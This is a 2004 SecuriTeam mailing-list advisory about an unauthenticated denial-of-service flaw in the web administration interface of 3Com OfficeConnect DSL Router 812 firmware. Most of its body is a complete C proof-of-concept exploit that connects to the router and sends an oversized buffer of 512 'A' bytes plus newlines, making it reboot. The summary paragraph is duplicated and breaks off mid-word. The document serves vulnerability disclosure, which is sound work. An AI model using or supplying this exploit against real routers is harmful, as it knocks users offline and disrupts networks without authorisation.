[EXPL] 3Com DSL Router Administrative Interface Long Request DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 02/24/04

  • Next message: SecuriTeam: "[UNIX] phpNewsManager Directory Travarsal"
    To: list@securiteam.com
    Date: 24 Feb 2004 11:31:50 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      3Com DSL Router Administrative Interface Long Request DoS
    ------------------------------------------------------------------------

    SUMMARY

    OfficeConnect is a router widely used in the world. The router can be
    rebooted due to a flaw in its web administration interface. As no
    authentication is needed, every LAN user can cause a crash and reboot of
    the router, stopping internet connection for one or two minutes. A remote
    user can exploit it if the web interface is available in the WAN interface
    of the router or if he can persuade a user to click on a link in a forum
    or to visit a webpage (as you can always access the web interface if the
    connection is local initiated, as is from the web browser).OfficeConnect
    is a router widely used in the world. The router can be rebooted due to a
    flaw in its web administration interface. As no authentication is needed,
    every LAN user can cause a crash and reboot of the router, stopping
    internet connection for one or two minutes. A remote user can exploit it
    if the web interface is available in the WAN interface of the router or if
    he can persuade a user to click on a li!

    DETAILS

    Vulnerable Systems:
     * 3Com OfficeConnect DSL Router 812 1.1.7
     * 3Com OfficeConnect DSL Router 812 1.1.9
     * 3Com OfficeConnect DSL Router 812 2.0

    Exploit:
    /* 3com-DoS.c
     *
     * PoC DoS exploit for 3Com OfficeConnect DSL Routers.
     * discovered by David F. Madrid.
     *
     * Successful exploitation of the vulnerability should cause the router to
     * reboot. It is not believed that arbitrary code execution is possible -

     * check advisory for more information.
     *
     * -shaun2k2
     */
     

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <netinet/in.h>

    int main(int argc, char *argv[]) {
     if(argc < 3) {
      printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <
    shaunige@yahoo.co.uk>\n\n");
      printf("Usage: 3comDoS < 3com_router> < port>\n");
      exit(-1);
     }

     int sock;
     char explbuf[521];
     struct sockaddr_in dest;
     struct hostent *he;

     if((he = gethostbyname(argv[1])) == NULL) {
      printf("Couldn't resolve %s!\n", argv[1]);
      exit(-1);
     }

     if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
      perror("socket()");
      exit(-1);
     }

     printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <
    shaunige@yahoo.co.uk>\n\n");
     
     dest.sin_addr = *((struct in_addr *)he->h_addr);
     dest.sin_port = htons(atoi(argv[2]));
     dest.sin_family = AF_INET;

     printf("[+] Crafting exploit buffer.\n");
     memset(explbuf, 'A', 512);
     memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);

     if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) ==
    -1) {
      perror("connect()");
      exit(-1);
     }

     printf("[+] Connected...Sending exploit buffer!\n");
     send(sock, explbuf, strlen(explbuf), 0);
     sleep(2);
     close(sock);
     printf("\n[+] Exploit buffer sent!\n");
     return(0);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:shaunige@yahoo.co.uk> Shaun
    Colley.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] phpNewsManager Directory Travarsal"

    Relevant Pages

    • [NEWS] Telecom Italia Alice Pirelli Routers Backdoor Activates Telnet/FTP/TFTP
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Telecom Italia Alice Pirelli Routers Backdoor Activates Telnet/FTP/TFTP ... admin interface service with Admin privileges, ... special IP packet to router specific ip 192.168.1.1. ...
      (Securiteam)
    • [NEWS] Siemens Santis 50 Information Disclosure
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... "The Siemens Santis 50 Wireless router is a wi-fi ADSL router. ... The mentioned routers provides a web management interface and the classic ...
      (Securiteam)
    • [Full-Disclosure] FW: Cisco Vulnerability forensic protocol analysis results.
      ... AMILABS CISCO IP PROTOCOL EXPLOIT TESTING RESULTS ... Cisco router interfaces using either all or one of the following IP ... of a remote Cisco interface uses all of them. ... output buffer failures, 0 output buffers swapped out Router4# ...
      (Full-Disclosure)
    • Re: Site-to-Site VPN client routing question - clients at branch office not able to acce
      ... I would recommend that you use some other machine as your router, ... select the demand-dial interface from the dropdown list. ... On the RRAS server in Shanghai, configure a demand-dial interface and give it a static route to 194.1.1.0/24 as above. ... This makes sure that the connection is made to the correct dd interface and sets up the correct route back to Shanghai through the VPN link. ...
      (microsoft.public.windows.server.networking)
    • [NEWS] Motorola Wireless Router WR850G Authentication Circumvention
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WR850G Wireless Broadband Router, is built with both an 802.11g wireless ... enables an attacker to log into the routers web interface without knowing ... username and password after logging in. ...
      (Securiteam)